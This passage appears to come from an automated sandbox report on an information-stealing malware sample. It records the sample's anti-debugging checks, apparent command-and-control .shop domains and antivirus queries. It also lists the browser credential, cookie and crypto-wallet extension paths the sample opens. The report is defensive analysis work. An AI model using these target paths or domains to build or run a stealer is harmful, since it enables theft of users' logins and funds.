                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SICE
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SIWVID
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_05430112 rdtsc 5_2_05430112
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_00D8652B mov eax, dword ptr fs:[00000030h]5_2_00D8652B
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_00D8A302 mov eax, dword ptr fs:[00000030h]5_2_00D8A302
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_007BA302 mov eax, dword ptr fs:[00000030h]6_2_007BA302
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_007B652B mov eax, dword ptr fs:[00000030h]6_2_007B652B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_007BA302 mov eax, dword ptr fs:[00000030h]7_2_007BA302
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_007B652B mov eax, dword ptr fs:[00000030h]7_2_007B652B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007BA302 mov eax, dword ptr fs:[00000030h]9_2_007BA302
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007B652B mov eax, dword ptr fs:[00000030h]9_2_007B652B

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Dl6wuWiQdg.exeString found in binary or memory: cloudewahsj.shop
                        Source: Dl6wuWiQdg.exeString found in binary or memory: noisycuttej.shop
                        Source: Dl6wuWiQdg.exeString found in binary or memory: rabidcowse.shop
                        Source: Dl6wuWiQdg.exeString found in binary or memory: framekgirus.shop
                        Source: Dl6wuWiQdg.exeString found in binary or memory: tirepublicerj.shop
                        Source: Dl6wuWiQdg.exeString found in binary or memory: abruptyopsn.shop
                        Source: Dl6wuWiQdg.exeString found in binary or memory: wholersorie.shop
                        Source: Dl6wuWiQdg.exeString found in binary or memory: fancywaxxers.shop
                        Source: Dl6wuWiQdg.exeString found in binary or memory: nearycrepso.shop
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                        Source: Dl6wuWiQdg.exe, Dl6wuWiQdg.exe, 00000000.00000002.2304850960.0000000000F71000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: uu!HProgram Manager
                        Source: 8WYS1MQTL0QCOHKIPL8.exe, 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, skotes.exe, 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: Program Manager
                        Source: Dl6wuWiQdg.exe, 00000000.00000002.2304850960.0000000000F71000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ouu!HProgram Manager
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_0079DD91 cpuid 9_2_0079DD91
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_00D6CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,5_2_00D6CBEA
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007865E0 LookupAccountNameA,9_2_007865E0
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007C2517 GetTimeZoneInformation,9_2_007C2517
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2213997207.0000000000814000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2219903539.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2235255051.0000000000838000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2214091045.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2214091045.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2213901723.0000000000838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: 9.2.skotes.exe.780000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.skotes.exe.780000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.8WYS1MQTL0QCOHKIPL8.exe.d50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.skotes.exe.780000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Dl6wuWiQdg.exe PID: 6248, type: MEMORYSTR
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                        Source: Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                        Source: Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2199107925.000000000082F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2184466380.00000000053C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3#
                        Source: Dl6wuWiQdg.exe, 00000000.00000002.2303431239.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2199147278.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2199147278.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
